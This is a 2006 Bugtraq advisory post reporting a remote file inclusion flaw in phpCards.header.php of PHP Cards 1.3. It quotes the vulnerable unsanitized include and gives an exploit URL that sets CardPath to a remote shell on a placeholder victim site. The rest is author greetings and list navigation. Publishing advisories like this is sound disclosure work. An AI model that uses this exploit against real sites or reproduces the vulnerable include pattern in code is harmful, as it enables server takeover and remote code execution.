PHP Cards <= 1.3 Remote File Inclue Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP Cards <= 1.3 Remote File Inclue Vulnerability
From: Le.CoPrA@xxxxxxxxxxx
Date: 13 Oct 2006 01:04:50 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

=====================================================================

  # PHP Cards <= 1.3  Remote File Inclue Vulnerability

=====================================================================

  # Author : Le CoPrA

=====================================================================

  # Download Script : http://www.s3hr.com/PHP Cards 1.3.zip

=====================================================================
  
  # Bug in : phpCards.header.php

  # Vuln Code :

                
include "$CardPath"


 =====================================================================

  # Exploit :

          http://www.victim.com/[path]/phpCards.header.php?CardPath=|SHELL|?

 =====================================================================

   # Discovered by : Le CoPrA

   # ConTaCT  :  Le.CoPrA |at| Hotmail |dot| CoM

   # Special Greetz FlyinG 2 || Str0ke , xoron , mdx ||

   # Greetz4// alkasrgolden,LovER BoY, Saudi Hackrz, HACKERS PAL,kOnDoR, 
Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64
             3theaby geer, Mohajer22, Qaher_Yhod, MR.WOLF, cRiMiNaL NeT, 
al3iznet,Abdullah-00 , egyptghost, ToOoFA,HaKrAwY

   # Channel : wWw.TrYaG.cOm/vb  || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com

===========================================================================================================================

Prev by Date: ISOI II - a DA Workshop (announcement and CFP)
Next by Date: Utimaco Safeguard Easy vulnerability
Previous by thread: ISOI II - a DA Workshop (announcement and CFP)
Next by thread: Utimaco Safeguard Easy vulnerability
Index(es):
- Date
- Thread